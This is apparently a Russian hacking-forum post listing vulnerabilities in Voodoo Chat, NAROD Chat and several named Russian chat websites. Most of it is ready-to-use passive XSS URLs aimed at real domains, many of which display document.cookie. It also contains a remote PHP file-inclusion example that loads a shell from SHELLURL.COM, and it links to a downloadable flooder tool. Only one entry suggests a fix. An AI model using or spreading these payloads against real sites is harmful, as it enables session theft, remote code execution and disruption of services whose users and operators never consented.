------------------------- Vodoo CHAT ---------------------------
Type:
[XSS]
Product: Voodoo chat
Author:
qBiN
Exploit:
Код:
http://site.com/chat/go.php?url=javascript:alert(/Tested%20by%20qBiN/);
Решение: фильтровать переменную урл,можно даже проверять её на валидность
с помощью сокетов.
------------------------------
Type:
[XSS]
Product: Voodoo chat
Author:
qBiN
Exploit:
Код:
http://sitename/chat/password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN test/);%3C/script%3E
------------------------------
Type:
[PHP Including]
Product: Voodoo chat 1.0RC1b и возможно болие ранние версий.
Источник:
xakep.ru
Пример:
Код:
http://sitename.com/[ScriptPath]/index.php?file_path=http://SHELLURL.COM?
------------------------------
Type:
FLOODER
Product: Voodoo chat
Author:
NaX[no]r†
exploit: http://www.balartrating.ru/flood.zip
------------------------- ЧАТ БОРОДИНА ---------------------------
Может матерьял немного стар но всёже http://antichat.ru/txt/chat_borodin/
Видео лежит здесь http://video.antichat.net/videos/chat_borodin.rar
Уязвимость нашел:
Morph
Автор статьи:
Morph
------------------------- NAROD Chat ---------------------------
Type:
[XSS]
Product: NAROD Chat
Author:
[sL1p]
Exploit: Passive XSS:
Код:
http://www.yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert(document.cookie)</script>
------------------------- Уязвимости конкретных чатов ---------------------------
Type:
[XSS]
Product: www.bazar.co.ua
Author:
max_pain89
Exploit: Passive ХSS:
Код:
http://www.bazar.co.ua/?error[]=<script>confirm(/xxx/)</script>
------------------------------
Type:
[XSS]
Product: www.sibchat.ru
Author:
[sL1p], Kaban
Exploit: Passive ХSS:
Код:
http://www.sibchat.ru/gallery.php?sid='><script>alert(document.cookie)</script>
http://www.sibchat.ru/card_help.php?sid="><script>alert(document.cookie)</script>
http://www.sibchat.ru/register.php?sid="><script>alert(document.cookie)</script>
------------------------------
Type:
[XSS]
Product: www.chatinez.zp.ua
Author:
[sL1p]
Exploit: Passive XSS:
Код:
http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cookie)</script>
При желании
001 Можно заменить на:
002, 003, 004, 005, 006, 007, 008, 009, 010, 011, 012, 013, 014, 015, 016
------------------------------
Type:
[XSS]
Product: www.smchat.ru
Author:
[sL1p]
Exploit: Passive XSS:
Код:
http://www.smchat.ru/?key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?chatname=&key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?ontopic=default&login="><script>alert(document.cookie)</script>
http://www.smchat.ru/?activate=&login="><script>alert(document.cookie)</script>
http://www.smchat.ru/?password1=&login="><script>alert(document.cookie)</script>
http://www.smchat.ru/?det=default&login="><script>alert(document.cookie)</script>
http://www.smchat.ru/?count=1000&key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?email=&key="><script>alert(document.cookie)</script>
------------------------------
Type:
[XSS]
Product: www.chat.ru
Author:
[sL1p]
Exploit: Passive XSS:
Код:
http://www.chat.ru/user/register.html?dop10=default&confemail="><script>alert(document.cookie)</script>
http://www.chat.ru/user/register.html?anotherpw="><script>alert(document.cookie)</script>
http://www.chat.ru/user/register.html?city=&name="><script>alert(document.cookie)</script>
http://www.chat.ru/user/register.html?action=default&username="><script>alert(document.cookie)</script>
http://www.chat.ru/user/register.html?city=&year="><script>alert(document.cookie)</script>
Комбинируя запросы можно реализовать гораздо больше xss чем в этом списке.
------------------------------
Type:
[XSS]
Product: www.krovatka.ru
Author:
[sL1p], blackybr
Exploit: Passive XSS:
Код:
http://klubnichka.krovatka.ru/k?f=45&newwin=1&id2=5816&id=5673xee7kY1Y&c=8"><script>alert(document.cookie)</script>
http://klubnichka.krovatka.ru/f/e.cgi?c=6&n="><script>alert(document.cookie)%3B</script>
http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn="><script>alert(document.cookie)%3B</script>
http://klubnichka.krovatka.ru/sms/xp.cgi?mn="><script>alert(document.cookie)%3B</script>&ch=6&flag=0
http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn=%3Cmeta+http-equiv=%3E%3C/title%3E%20%3Cscript%3Ealert(document.cookie)%3C/script%3E
Для примера взят канал klubnichka, изменяя название канала естесственно можно реализовывать xss везде.
------------------------------
Type:
[XSS]
Product: www.chatcity.ru
Author:
[sL1p]
Код:
http://www.Chat ID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn="><script>alert(document.cookie)</script>
Chat ID заменяем на адрес чата. У всех они в цифровом значении.
------------------------------
P.s
Если есть какието узявимости по движкам чатов или по каким-то конкретным чатам пишите мне в ПМ я добавлю суда.
Уязвимости чатов и Движков
Похожие темы
Древовидный вид